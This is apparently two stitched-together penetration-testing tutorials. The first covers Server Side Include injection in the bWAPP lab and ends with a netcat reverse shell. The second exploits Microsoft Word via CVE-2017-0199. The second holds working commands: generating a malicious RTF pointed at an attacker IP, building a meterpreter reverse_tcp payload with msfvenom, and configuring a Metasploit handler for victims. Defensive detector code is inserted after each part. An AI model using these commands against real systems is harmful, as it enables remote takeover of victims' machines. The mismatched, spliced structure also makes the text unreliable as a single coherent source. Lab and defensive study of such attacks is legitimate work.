
Server Side Include Injection Exploitation in bWAPP

In this article you will learn how to exploit a vulnerable server using Server Side Include injection, commonly known as SSI injection.

SSIs are directives present in web applications used to feed an HTML page with dynamic content. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected into input fields and sent to the web server.
For more information visit owasp.org
Let's begin.
In your Kali Linux, open the target IP in the browser: 192.168.1.103/bWAPP/login.php. Enter the user and password as bee and bug respectively.


Set the security level to low, choose Server Side Include Injection from the bug list box, and click Hack.


The requested web page will now open; you can see it has two text fields, for first name and last name respectively.


I then entered the random name test as both the first name and the last name, to find out exactly what I would receive when clicking the Lookup tab. Here the first name text field is vulnerable to SSI injection.


When I clicked Lookup, a new web page popped up on the screen showing the IP 192.168.1.107 of my Kali Linux.


Now I will try to exploit this vulnerability by sending different types of malicious code to the web application. If you look carefully at the following screenshot, I sent a script that generates an alert prompt on the screen. To perform this, modify the first name text field and type the following code inside it.



So when we click Lookup again, an alert prompt "hack" pops up on the screen. This confirms that the first name text field is vulnerable.


Similarly, I executed the following code, which returns the current date and time.


In this way the directive displays the content of an HTTP environment variable; in the screenshot you can read the highlighted day, date and time.


Fetching the cookies of the web server is also possible here. We only need to type the following script code in the same text field.


Now an alert prompt pops up again, this time with the server's cookie, which we can use for further exploitation.


Using the exec directive we can execute a server side command, passed as the cmd parameter. Here I am trying to retrieve a list of all files and folders using the following code.


Wonderful!! So you can see that without fully compromising the server we have obtained all the directories present inside it.


Now, finally, we will try to access a remote shell using netcat, which will help us establish a reverse connection with the targeted system. Open a terminal to start a netcat listener on port 4444 and type the following inside the vulnerable text field as done above.


So when you click the Lookup tab again you will get a reverse connection through the netcat shell, as I received in the following image, which means the web application server is compromised and we can execute the following commands to penetrate further.
id
pwd
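The directives used above (echo of an environment variable, exec with a cmd parameter) all share the `<!--#name ... -->` shape, which is what a defender can key on. The following is an added example, not code from the post or from bWAPP: a Python stand-in for the lookup page that shows the unsanitized reflection beside an HTML-escaped form, plus a directive finder that can be run over captured form submissions. The field names and sample requests are constructed.

```python
import html
import re

# An SSI directive looks like <!--#name attr="value" -->; this pattern pulls out
# the directive name (echo, exec, include, ...) from anything a user submits.
SSI_DIRECTIVE = re.compile(r"<!--#\s*(\w+)\b(.*?)-->", re.DOTALL | re.IGNORECASE)

def find_ssi_directives(value):
    """Return the lower-cased names of SSI directives present in a string."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(value)]

def render_unsafe(first_name, last_name):
    # Stand-in for the vulnerable lookup page: input is reflected verbatim, so a
    # directive in it reaches the SSI processor and is executed by the server.
    return "<p>First name: %s<br>Last name: %s</p>" % (first_name, last_name)

def render_safe(first_name, last_name):
    # Hardened form: HTML-escaping turns '<' into '&lt;', so the reflected text
    # can never form a "<!--#" directive, whatever the user typed.
    return "<p>First name: %s<br>Last name: %s</p>" % (
        html.escape(first_name, quote=True), html.escape(last_name, quote=True))

def classify_request(params):
    """Return (field, directive) pairs for every field carrying an SSI directive,
    suitable for a WAF rule or for triaging captured POST bodies."""
    return [(field, name) for field, value in params.items()
            for name in find_ssi_directives(value)]

# Constructed sample submissions, mirroring the two-field form in the walkthrough.
SAMPLE_REQUESTS = [
    {"firstname": "test", "lastname": "test"},
    {"firstname": '<!--#echo var="DATE_LOCAL" -->', "lastname": "test"},
    {"firstname": '<!--#exec cmd="ls" -->', "lastname": "test"},
]

if __name__ == "__main__":
    for params in SAMPLE_REQUESTS:
        print(classify_request(params))
        print(render_safe(params["firstname"], params["lastname"]))
```

Escaping output is the fix for reflected input; disabling exec in the server's SSI configuration (or turning SSI off for user-controlled pages) removes the command execution path entirely.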

Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199)



Microsoft Word is vulnerable to malicious RTF files. In this article we carry out a zero day attack on MS Word 2013 using a python script which generates a malicious .rtf file and gives a meterpreter session on the targeted system.

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit the Microsoft RTF RCE. It can generate a malicious RTF file and deliver a metasploit / meterpreter / any other payload to the victim without any complex configuration.
Let’s start!!!

Attacker: Kali Linux
Target: Windows 10 (Microsoft Word 2007 - 2013)

Open a terminal in your Kali Linux and type the following to download this script.


cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc
This command runs a python script to generate a rich text format payload, where -M gen is used for generating the rtf file, -w gives the name of the rtf file, i.e. "sales.rtf", and -u gives the attacker's IP address or domain name.



As you can see in the screenshot, the above command has generated a malicious sales.rtf file. Before we send this file to our victim we need to connect it with a backdoor file so that we can establish a reverse connection with the victim.



In a new terminal, use msfvenom to prepare an exe payload for the attack and type the following.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 -f exe > /root/Desktop/raj.exe


Now move raj.exe into /var/www/html.
 

Now type the following command, which merges raj.exe with sales.rtf. Then share the updated rtf file with the victim and start the multi handler at the same time to receive the victim's reverse connection.
python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe



When the victim opens the sales file, which will be in doc format, the attacker will receive a meterpreter session inside the Metasploit framework.
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
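Two properties of the file produced above are useful on the receiving side: it is RTF content delivered under a .doc name, and it carries an OLE object. The following is an added defender-side example, not part of the post or of the toolkit: a Python check that flags a document whose bytes start with the RTF signature while its extension says otherwise, and an RTF that contains the `\object` control word. Treating any `\object` in such a file as suspicious is an assumption of this check, and the sample bytes are constructed, not real exploit files.

```python
import os
import re

RTF_MAGIC = b"{\\rtf"
# RTF control word that opens an embedded/linked OLE object destination.
# Assumption: any object inside a document that arrived as .doc is worth flagging.
OBJECT_WORD = re.compile(rb"\\object\b")

def inspect_document(path, data):
    """Return a list of finding tags for a file, from its extension and raw bytes."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    is_rtf = data.lstrip().startswith(RTF_MAGIC)
    if is_rtf and ext != ".rtf":
        # Extension/content mismatch: RTF delivered as .doc (or anything else).
        findings.append("rtf-content-with-%s-extension" % ext.lstrip("."))
    if is_rtf and OBJECT_WORD.search(data):
        findings.append("rtf-embeds-ole-object")
    return findings

# Constructed samples: a plain RTF, an RTF skeleton with an object destination
# delivered under a .doc name, and a non-RTF .doc (OLE compound file signature).
BENIGN_RTF = b"{\\rtf1\\ansi Hello from sales}"
RTF_AS_DOC = b"{\\rtf1\\ansi{\\object{\\*\\objdata 0105}}}"
REAL_DOC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8

def demo():
    return {
        "sales.rtf": inspect_document("sales.rtf", BENIGN_RTF),
        "sales.doc": inspect_document("sales.doc", RTF_AS_DOC),
        "report.doc": inspect_document("report.doc", REAL_DOC),
    }

if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

A mail gateway or endpoint scanner can apply the same two checks before the file reaches Word, which is where the handler above is waiting for it to be opened.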